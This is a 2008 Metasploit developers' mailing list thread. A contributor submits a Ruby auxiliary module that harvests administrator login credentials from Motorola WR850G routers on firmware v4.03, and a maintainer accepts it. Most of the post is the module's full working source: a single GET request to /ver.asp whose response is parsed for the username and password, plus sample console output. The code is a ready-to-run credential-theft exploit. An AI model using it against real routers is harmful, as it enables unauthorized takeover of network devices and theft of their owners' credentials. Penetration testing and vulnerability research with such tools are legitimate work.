Applied. Thanks! Best regards, Ramon
On Sun, 2008-10-05 at 00:56 -0500, Kris Katterjohn wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Hey guys, > > I've attached a new auxiliary module for obtaining the login credentials to a > Motorola WR850G router with firmware v4.03. I just put it under admin, but > there is probably a better place for it. > > > msf auxiliary(wr850g_cred) > run > [*] Found username "xxxx" and password "yyyy" > [*] Auxiliary module execution completed > > > msf > info admin/wr850g_cred > > Name: Motorola WR850G v4.03 Credentials > Version: 1 > > Provided by: > Kris Katterjohn <[EMAIL PROTECTED]> > > Basic options: > Name Current Setting Required Description > ---- --------------- -------- ----------- > RHOST yes The target address > RPORT 80 yes The target port > > Description: > Login credentials to the Motorola WR850G router with firmware v4.03 > can be obtained via a simple GET request if issued while the > administrator is logged in. A lot more information is available > through this request, but you can get it all and more after logging > in. > > > This was disclosed back in Sep 2004, but I still easily found one lying around > with this firmware. > > Thanks, > Kris Katterjohn > > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.6 (GNU/Linux) > Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org > > iQIVAwUBSOhXA/9K37xXYl36AQJ9Ww//e5dyR9E4yqoIYYqARyOlyJ47mAQvxmpK > mmsLFjOQaqmupEpb7fk85zB3YEHqgYwDp6eLKgsZ4T0xGjmq4PcE1JH8c5L5Vdwd > p9lx1HLkzU759Dk9azcHDhTDSYsvGxxuVShbQiYLX8G0u+M8toiJqJ9iFNFkc3mO > sDP681NG7hG0i8kB0myWkXBhuVk+qc5S1hThmaCyqTNKFnjckCfRvsU/8Y1/IiOp > of0LGIayxn4RPhPXMpaXxowhEE+ey5xMKgYpkl7c7Rg7+fAU5LIHQwUEBlP1szv9 > 9CXuB5WNl8wMSGGZ62ktu3zQIi901LEQxO7W87KmePi7g087tBu60EM5+gz/qIto > xuxvToutzlBAdhtxKx09XRXTlcRlm3P/AxXJP7neXP8QxEwgR3swsPtTzf0vMOb5 > vykTFSBrhbWP13WIhNH8gPN5zOEXV8RzY4pbJklSZ106TTDRH2dY6b8eLA2jW03L > 2BtJAhO6GFL5cYbf28r2yIIqFauy13MGgqhjI/p/rRsxYAMh7ITL5388YVLm+QYd > vAPxGxztIla2MHeB/C6sAzj9+U2db/ItISg+W1Cn56+Mhkcou8Nd4NIqlhZbzwUm > v3u3SoToa6f0GpAlTyjqwf0+ydHmWL+xRbiIb0pJQJzEohkksf9/6uBQ1B/08wyn > YKKXU8cKEmk= > =VU+S > -----END PGP SIGNATURE----- > plain text document attachment (wr850g_cred.rb) > require 'msf/core' > > class Metasploit3 < Msf::Auxiliary > > include Msf::Exploit::Remote::Tcp > > def initialize(info = {}) > super(update_info(info, > 'Name' => 'Motorola WR850G v4.03 Credentials', > 'Description' => %q{ > Login credentials to the Motorola WR850G router > with > firmware v4.03 can be obtained via a simple GET > request > if issued while the administrator is logged in. > A lot > more information is available through this > request, but > you can get it all and more after logging in. > }, > 'Author' => 'Kris Katterjohn <[EMAIL > PROTECTED]>', > 'License' => MSF_LICENSE, > 'Version' => '1', > 'References' => > [ [ 'URL', > 'http://seclists.org/bugtraq/2004/Sep/0339.html'] ], > 'DisclosureDate' => 'Sep 24 2004')) > > register_options([Opt::RPORT(80)]) > end > > def run > connect > > sock.put("GET /ver.asp HTTP/1.0\r\n\r\n") > response = sock.get > > disconnect > > if response.nil? or response.empty? > print_status("No response from server") > return > end > > # 302 Redirect > if response.split(/\r\n/)[0] !~ /200 Ok/ > print_status("Administrator not logged in") > return > end > > user = $1 if response.match("http_username=([^\n]*)<br>") > pass = $1 if response.match("http_passwd=([^\n]*)<br>") > > print_status("Found username \"#{user}\" and password > \"#{pass}\"") if user and pass > end > end > > _______________________________________________ > Framework-Hackers mailing list > Framework-Hackers@spool.metasploit.com > http://spool.metasploit.com/mailman/listinfo/framework-hackers _______________________________________________ Framework-Hackers mailing list Framework-Hackers@spool.metasploit.com http://spool.metasploit.com/mailman/listinfo/framework-hackers